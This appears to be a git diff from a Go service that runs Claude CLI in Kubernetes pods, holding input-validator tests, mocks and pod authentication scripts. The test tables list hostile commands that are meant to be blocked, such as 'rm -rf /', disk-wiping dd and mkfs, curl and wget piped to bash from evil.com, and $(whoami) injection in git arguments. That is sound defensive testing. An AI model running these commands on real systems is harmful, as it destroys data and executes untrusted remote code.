{"semicolon spaces", "ls ; rm -rf /", true, "command chaining"},
|
||||
|
||||
// Command chaining - AND
|
||||
{"and operator", "ls && rm -rf /", true, "command chaining"},
|
||||
|
||||
// Command chaining - OR
|
||||
{"or operator", "ls || rm -rf /", true, "command chaining"},
|
||||
|
||||
// Pipe
|
||||
{"pipe", "ls | grep foo", true, "command chaining"},
|
||||
|
||||
// Backtick
|
||||
{"backtick", "echo `whoami`", true, "command chaining"},
|
||||
|
||||
// Command substitution
|
||||
{"command sub dollar", "echo $(whoami)", true, "command chaining"},
|
||||
{"variable expansion", "echo ${PATH}", true, "command chaining"},
|
||||
|
||||
// Process substitution
|
||||
{"process sub output", "cat >(ls)", true, "command chaining"},
|
||||
{"process sub input", "cat <(ls)", true, "command chaining"},
|
||||
|
||||
// Newlines - caught by either chain detection or rm detection (order depends on implementation)
|
||||
{"newline", "ls\nrm -rf /", true, ""},
|
||||
{"carriage return", "ls\rrm -rf /", true, ""},
|
||||
|
||||
// Redirects
|
||||
{"output redirect", "ls > file.txt", true, "redirect"},
|
||||
{"append redirect", "ls >> file.txt", true, "redirect"},
|
||||
{"input redirect", "cat < file.txt", true, "redirect"},
|
||||
|
||||
// Dangerous commands
|
||||
{"rm rf root", "rm -rf /", true, "destructive rm"},
|
||||
{"rm rf home", "rm -rf /home", true, "destructive rm"},
|
||||
{"rm rf etc", "rm -rf /etc", true, "destructive rm"},
|
||||
{"rm rf parent", "rm -rf ..", true, "destructive rm"},
|
||||
{"dd command", "dd if=/dev/zero of=/dev/sda", true, "dd command"},
|
||||
{"mkfs command", "mkfs.ext4 /dev/sda1", true, "mkfs command"},
|
||||
{"shutdown", "shutdown -h now", true, "shutdown"},
|
||||
{"reboot", "reboot", true, "reboot"},
|
||||
{"systemctl stop", "systemctl stop critical-service", true, "dangerous systemctl"},
|
||||
{"chmod 777 root", "chmod -R 777 /", true, "dangerous chmod"},
|
||||
{"chown root", "chown -R nobody /", true, "dangerous chown"},
|
||||
// curl/wget pipe - caught by pipe detection before the curl/wget patterns
|
||||
{"curl pipe bash", "curl https://evil.com/script.sh | bash", true, "command chaining"},
|
||||
{"wget pipe sh", "wget -O - https://evil.com | sh", true, "command chaining"},
|
||||
|
||||
// Safe rm commands should pass
|
||||
{"rm single file", "rm file.txt", false, ""},
|
||||
{"rm directory", "rm -r ./temp", false, ""},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := ShellCommand(tt.cmd)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ShellCommand(%q) error = %v, wantErr %v", tt.cmd, err, tt.wantErr)
|
||||
return
|
||||
}
|
||||
if tt.wantErr && err != nil && tt.errMsg != "" {
|
||||
if !strings.Contains(err.Error(), tt.errMsg) {
|
||||
t.Errorf("ShellCommand(%q) error = %v, want error containing %q", tt.cmd, err, tt.errMsg)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestGitArgs(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
args []string
|
||||
wantErr bool
|
||||
errMsg string
|
||||
}{
|
||||
// Valid git commands
|
||||
{"status", []string{"status"}, false, ""},
|
||||
{"log", []string{"log", "--oneline", "-10"}, false, ""},
|
||||
{"diff", []string{"diff", "HEAD~1"}, false, ""},
|
||||
{"branch", []string{"branch", "-a"}, false, ""},
|
||||
{"checkout", []string{"checkout", "-b", "feature/new"}, false, ""},
|
||||
{"commit", []string{"commit", "-m", "Fix bug"}, false, ""},
|
||||
{"add", []string{"add", "."}, false, ""},
|
||||
{"fetch", []string{"fetch", "origin"}, false, ""},
|
||||
{"pull", []string{"pull", "origin", "main"}, false, ""},
|
||||
{"push simple", []string{"push", "origin", "main"}, false, ""},
|
||||
|
||||
// Empty
|
||||
{"empty args", []string{}, true, "empty git args"},
|
||||
|
||||
// Dangerous subcommands
|
||||
{"config", []string{"config", "--global", "user.name", "attacker"}, true, "git config"},
|
||||
{"remote add", []string{"remote", "add", "evil", "https://evil.com/repo"}, true, "git remote"},
|
||||
|
||||
// Force push - blocked
|
||||
{"force push", []string{"push", "-f", "origin", "main"}, true, "force push"},
|
||||
{"force push long", []string{"push", "--force", "origin", "main"}, true, "force push"},
|
||||
{"force with lease", []string{"push", "--force-with-lease", "origin", "main"}, true, "force push"},
|
||||
|
||||
// Shell injection in args
|
||||
{"backtick in arg", []string{"log", "--format=`whoami`"}, true, "shell metacharacter"},
|
||||
{"command sub in arg", []string{"log", "--format=$(whoami)"}, true, "shell metacharacter"},
|
||||
{"null byte in arg", []string{"log", "file\x00.txt"}, true, "null byte"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := GitArgs(tt.args)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("GitArgs(%v) error = %v, wantErr %v", tt.args, err, tt.wantErr)
|
||||
return
|
||||
}
|
||||
if tt.wantErr && err != nil && tt.errMsg != "" {
|
||||
if !strings.Contains(err.Error(), tt.errMsg) {
|
||||
t.Errorf("GitArgs(%v) error = %v, want error containing %q", tt.args, err, tt.errMsg)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestClaudePrompt(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
prompt string
|
||||
wantErr bool
|
||||
errMsg string
|
||||
}{
|
||||
// Valid prompts
|
||||
{"simple prompt", "Hello, how are you?", false, ""},
|
||||
{"code prompt", "Write a function to sort an array", false, ""},
|
||||
{"multiline prompt", "Line 1\nLine 2\nLine 3", false, ""},
|
||||
{"unicode prompt", "Hello 你好 🎉", false, ""},
|
||||
{"special chars", "What does $ mean in bash?", false, ""},
|
||||
|
||||
// Empty
|
||||
{"empty string", "", true, "empty prompt"},
|
||||
{"whitespace only", " \t\n", true, "empty prompt"},
|
||||
|
||||
// Null bytes
|
||||
{"null byte", "Hello\x00World", true, "null byte"},
|
||||
|
||||
// Length limit
|
||||
{"at limit", strings.Repeat("a", 100000), false, ""},
|
||||
{"over limit", strings.Repeat("a", 100001), true, "prompt too long"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := ClaudePrompt(tt.prompt)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ClaudePrompt() error = %v, wantErr %v", err, tt.wantErr)
|
||||
return
|
||||
}
|
||||
if tt.wantErr && err != nil && tt.errMsg != "" {
|
||||
if !strings.Contains(err.Error(), tt.errMsg) {
|
||||
t.Errorf("ClaudePrompt() error = %v, want error containing %q", err, tt.errMsg)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestStreamID(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
id string
|
||||
wantErr bool
|
||||
errMsg string
|
||||
}{
|
||||
// Valid IDs
|
||||
{"empty allowed", "", false, ""},
|
||||
{"simple", "cmd-123", false, ""},
|
||||
{"with underscore", "cmd_123", false, ""},
|
||||
{"alphanumeric", "abc123XYZ", false, ""},
|
||||
{"typical id", "cmd-pantheon-001", false, ""},
|
||||
|
||||
// Invalid IDs
|
||||
{"starts with dash", "-cmd", true, "alphanumeric"},
|
||||
{"starts with underscore", "_cmd", true, "alphanumeric"},
|
||||
{"contains space", "cmd 123", true, "alphanumeric"},
|
||||
{"contains special", "cmd@123", true, "alphanumeric"},
|
||||
{"contains slash", "cmd/123", true, "alphanumeric"},
|
||||
{"too long", strings.Repeat("a", 65), true, "too long"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := StreamID(tt.id)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("StreamID(%q) error = %v, wantErr %v", tt.id, err, tt.wantErr)
|
||||
return
|
||||
}
|
||||
if tt.wantErr && err != nil && tt.errMsg != "" {
|
||||
if !strings.Contains(err.Error(), tt.errMsg) {
|
||||
t.Errorf("StreamID(%q) error = %v, want error containing %q", tt.id, err, tt.errMsg)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestError(t *testing.T) {
|
||||
// Test error with pattern
|
||||
err1 := &Error{
|
||||
Reason: "test reason",
|
||||
Input: "test input",
|
||||
Pattern: "test pattern",
|
||||
}
|
||||
if !strings.Contains(err1.Error(), "test reason") {
|
||||
t.Errorf("Error.Error() = %v, want to contain reason", err1.Error())
|
||||
}
|
||||
if !strings.Contains(err1.Error(), "test pattern") {
|
||||
t.Errorf("Error.Error() = %v, want to contain pattern", err1.Error())
|
||||
}
|
||||
|
||||
// Test error without pattern
|
||||
err2 := &Error{
|
||||
Reason: "test reason",
|
||||
Input: "test input",
|
||||
}
|
||||
if !strings.Contains(err2.Error(), "test reason") {
|
||||
t.Errorf("Error.Error() = %v, want to contain reason", err2.Error())
|
||||
}
|
||||
}
|
||||
124
internal/testutil/mocks.go
Normal file
124
internal/testutil/mocks.go
Normal file
@ -0,0 +1,124 @@
|
||||
// Package testutil provides testing utilities for rdev-api.
|
||||
package testutil
|
||||
|
||||
import (
|
||||
"context"
|
||||
"sync"
|
||||
|
||||
"github.com/orchard9/rdev/internal/executor"
|
||||
)
|
||||
|
||||
// MockExecutor is a mock implementation of the Executor for testing.
|
||||
type MockExecutor struct {
|
||||
mu sync.Mutex
|
||||
ExecCalls []ExecCall
|
||||
ExecResult executor.Result
|
||||
ExecOutputs []OutputLine
|
||||
PodExistsMap map[string]bool
|
||||
ConnectionError error
|
||||
}
|
||||
|
||||
// ExecCall records the parameters of an Exec call.
|
||||
type ExecCall struct {
|
||||
Cmd *executor.Command
|
||||
}
|
||||
|
||||
// OutputLine represents a line of output to send.
|
||||
type OutputLine struct {
|
||||
Stream string
|
||||
Line string
|
||||
}
|
||||
|
||||
// Ensure MockExecutor implements CommandExecutor at compile time.
|
||||
var _ executor.CommandExecutor = (*MockExecutor)(nil)
|
||||
|
||||
// NewMockExecutor creates a new mock executor.
|
||||
func NewMockExecutor() *MockExecutor {
|
||||
return &MockExecutor{
|
||||
PodExistsMap: make(map[string]bool),
|
||||
}
|
||||
}
|
||||
|
||||
// Exec mocks command execution.
|
||||
func (m *MockExecutor) Exec(ctx context.Context, cmd *executor.Command, handler executor.OutputHandler) executor.Result {
|
||||
m.mu.Lock()
|
||||
m.ExecCalls = append(m.ExecCalls, ExecCall{Cmd: cmd})
|
||||
outputs := m.ExecOutputs
|
||||
result := m.ExecResult
|
||||
m.mu.Unlock()
|
||||
|
||||
// Send mock outputs
|
||||
for _, o := range outputs {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return executor.Result{ExitCode: 130, Error: ctx.Err()}
|
||||
default:
|
||||
handler(o.Stream, o.Line)
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// SetExecResult sets the result to return from Exec.
|
||||
func (m *MockExecutor) SetExecResult(result executor.Result) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.ExecResult = result
|
||||
}
|
||||
|
||||
// SetExecOutputs sets the outputs to send during Exec.
|
||||
func (m *MockExecutor) SetExecOutputs(outputs []OutputLine) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.ExecOutputs = outputs
|
||||
}
|
||||
|
||||
// PodExists mocks pod existence check.
|
||||
func (m *MockExecutor) PodExists(ctx context.Context, podName string) (bool, error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
exists, ok := m.PodExistsMap[podName]
|
||||
if !ok {
|
||||
return false, nil
|
||||
}
|
||||
return exists, nil
|
||||
}
|
||||
|
||||
// CheckConnection mocks cluster connection check.
|
||||
func (m *MockExecutor) CheckConnection(ctx context.Context) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
return m.ConnectionError
|
||||
}
|
||||
|
||||
// SetConnectionError sets the error to return from CheckConnection.
|
||||
func (m *MockExecutor) SetConnectionError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.ConnectionError = err
|
||||
}
|
||||
|
||||
// SetPodExists sets whether a pod exists.
|
||||
func (m *MockExecutor) SetPodExists(podName string, exists bool) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.PodExistsMap[podName] = exists
|
||||
}
|
||||
|
||||
// GetExecCalls returns all recorded Exec calls.
|
||||
func (m *MockExecutor) GetExecCalls() []ExecCall {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
return append([]ExecCall{}, m.ExecCalls...)
|
||||
}
|
||||
|
||||
// Reset clears all recorded calls and resets the mock.
|
||||
func (m *MockExecutor) Reset() {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.ExecCalls = nil
|
||||
m.ExecOutputs = nil
|
||||
m.ExecResult = executor.Result{}
|
||||
m.PodExistsMap = make(map[string]bool)
|
||||
}
|
||||
66
internal/testutil/testutil.go
Normal file
66
internal/testutil/testutil.go
Normal file
@ -0,0 +1,66 @@
|
||||
// Package testutil provides testing utilities for rdev-api.
|
||||
package testutil
|
||||
|
||||
import (
|
||||
"context"
|
||||
"database/sql"
|
||||
"os"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
_ "github.com/lib/pq" // PostgreSQL driver
|
||||
)
|
||||
|
||||
// TestDB returns a database connection for testing.
|
||||
// Uses TEST_DATABASE_URL or falls back to the standard local dev connection.
|
||||
func TestDB(t *testing.T) *sql.DB {
|
||||
t.Helper()
|
||||
|
||||
dsn := os.Getenv("TEST_DATABASE_URL")
|
||||
if dsn == "" {
|
||||
dsn = "postgres://appuser:localdev@localhost:5433/rdev?sslmode=disable"
|
||||
}
|
||||
|
||||
db, err := sql.Open("postgres", dsn)
|
||||
if err != nil {
|
||||
t.Fatalf("open database: %v", err)
|
||||
}
|
||||
|
||||
// Verify connection
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
if err := db.PingContext(ctx); err != nil {
|
||||
t.Skipf("database not available: %v", err)
|
||||
}
|
||||
|
||||
t.Cleanup(func() {
|
||||
db.Close()
|
||||
})
|
||||
|
||||
return db
|
||||
}
|
||||
|
||||
// CleanupTestKeys removes all test keys from the database.
|
||||
func CleanupTestKeys(t *testing.T, db *sql.DB) {
|
||||
t.Helper()
|
||||
|
||||
_, err := db.Exec("DELETE FROM api_keys WHERE name LIKE 'test-%'")
|
||||
if err != nil {
|
||||
t.Fatalf("cleanup test keys: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// TimePtr returns a pointer to a time.Time.
|
||||
func TimePtr(t time.Time) *time.Time {
|
||||
return &t
|
||||
}
|
||||
|
||||
// MustParseTime parses a time string or panics.
|
||||
func MustParseTime(layout, value string) time.Time {
|
||||
t, err := time.Parse(layout, value)
|
||||
if err != nil {
|
||||
panic(err)
|
||||
}
|
||||
return t
|
||||
}
|
||||
61
scripts/claude-auth.sh
Executable file
61
scripts/claude-auth.sh
Executable file
@ -0,0 +1,61 @@
|
||||
#!/bin/bash
|
||||
# claude-login.sh - Authenticate Claude CLI in a claudebox pod
|
||||
# Usage: ./scripts/claude-login.sh <project>
|
||||
# Example: ./scripts/claude-login.sh pantheon
|
||||
|
||||
set -e
|
||||
|
||||
# Check for project argument
|
||||
if [ -z "$1" ]; then
|
||||
echo "Usage: $0 <project>"
|
||||
echo ""
|
||||
echo "Available projects:"
|
||||
KUBECONFIG=~/.kube/orchard9-k3sf.yaml kubectl get pods -n rdev -l app.kubernetes.io/part-of=rdev \
|
||||
--no-headers -o custom-columns=":metadata.labels.rdev\.orchard9\.ai/project" 2>/dev/null | grep -v "^$" | sort -u
|
||||
echo ""
|
||||
echo "Example: $0 pantheon"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
PROJECT="$1"
|
||||
POD="claudebox-${PROJECT}-0"
|
||||
NAMESPACE="rdev"
|
||||
|
||||
# Verify kubeconfig
|
||||
export KUBECONFIG=~/.kube/orchard9-k3sf.yaml
|
||||
|
||||
# Check if pod exists and is running
|
||||
echo "Checking pod status..."
|
||||
STATUS=$(kubectl get pod "$POD" -n "$NAMESPACE" -o jsonpath='{.status.phase}' 2>/dev/null || echo "NotFound")
|
||||
|
||||
if [ "$STATUS" != "Running" ]; then
|
||||
echo "Error: Pod $POD is not running (status: $STATUS)"
|
||||
echo ""
|
||||
echo "Available pods:"
|
||||
kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/part-of=rdev
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo ""
|
||||
echo "=== Claude Login for $PROJECT ==="
|
||||
echo ""
|
||||
echo "This will open an interactive session to authenticate Claude."
|
||||
echo "You'll see a URL - open it in your browser to complete authentication."
|
||||
echo ""
|
||||
echo "Press Ctrl+C to cancel, or Enter to continue..."
|
||||
read
|
||||
|
||||
# Run claude interactively (will prompt for auth if needed)
|
||||
echo "Starting Claude..."
|
||||
kubectl exec -it "$POD" -n "$NAMESPACE" -c claudebox -- claude
|
||||
|
||||
echo ""
|
||||
echo "=== Authentication Complete ==="
|
||||
echo ""
|
||||
echo "Verifying Claude is authenticated..."
|
||||
kubectl exec "$POD" -n "$NAMESPACE" -c claudebox -- claude --version
|
||||
|
||||
echo ""
|
||||
echo "Claude is now authenticated in $POD"
|
||||
echo "You can run commands via the API or directly:"
|
||||
echo " kubectl exec -it $POD -n $NAMESPACE -- claude"
|
||||
@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
# Create Kubernetes secret from local Claude credentials
|
||||
# Run this after authenticating with `claude login` locally
|
||||
# Run this after authenticating with `claude` locally
|
||||
|
||||
set -e
|
||||
|
||||
@ -15,7 +15,7 @@ fi
|
||||
CLAUDE_DIR="$HOME/.claude"
|
||||
if [[ ! -d "$CLAUDE_DIR" ]]; then
|
||||
echo "Error: Claude credentials not found at $CLAUDE_DIR"
|
||||
echo "Run 'claude login' first to authenticate"
|
||||
echo "Run 'claude' first to authenticate"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
|
||||
@ -25,7 +25,7 @@ kubectl cluster-info > /dev/null || {
|
||||
}
|
||||
|
||||
# Note: Claude auth is stored in a PVC, not a secret
|
||||
# User will authenticate via: kubectl exec -it -n rdev claudebox-0 -- claude login
|
||||
# User will authenticate via: kubectl exec -it -n rdev claudebox-0 -- claude
|
||||
|
||||
# Check if ghcr-secret exists in rdev namespace
|
||||
if ! kubectl get secret ghcr-secret -n rdev > /dev/null 2>&1; then
|
||||
|
||||
Loading…
Reference in New Issue
Block a user